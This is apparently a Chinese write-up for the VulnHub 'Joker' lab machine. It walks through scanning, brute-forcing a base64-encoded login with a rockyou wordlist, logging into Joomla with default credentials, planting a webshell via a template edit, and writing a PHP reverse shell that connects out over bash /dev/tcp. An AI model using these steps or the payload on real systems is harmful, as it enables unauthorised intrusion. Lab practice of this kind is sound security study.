1.下载打开靶机
下载地址:https://download.vulnhub.com/ha/joker.zip
2.扫描靶机ip
3.访问靶机ip
开启了的端口11尝试
4.扫描敏感目录
5.访问secret.txt
多次出现rock,指的是kali自带的rockyou.txt字典;100指的是取字典的前100个;再结合前文,可知应该采用爆破登录8080的网站
6.下载字典前100个
进入文档内,解压文件rockyou.txt.gz
head -n 100 /usr/share/wordlists/rockyou.txt > test.txt
7.bp抓包发现登录信息使用了base64编码
8.发送到instructer进行攻击
设置payload
添加payload值
设置规则
攻击
将结果进行base64解码
9.登录8080端口
10.发现是joomla框架的网页,其弱口令是joomla/joomla,尝试使用弱口令登陆后台
继续登录
11.寻找漏洞
尝试后台getshell:Extensions---templates---templates----beez3
12..新建木马
13.蚁剑连接
14.反弹shell
创建一个新文件写入反弹shell的php代码
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.174/6666 0>&1'");?>
访问666.php,kali监听
 "在AD域中恢复被删除的账户(LDP.EXE)")
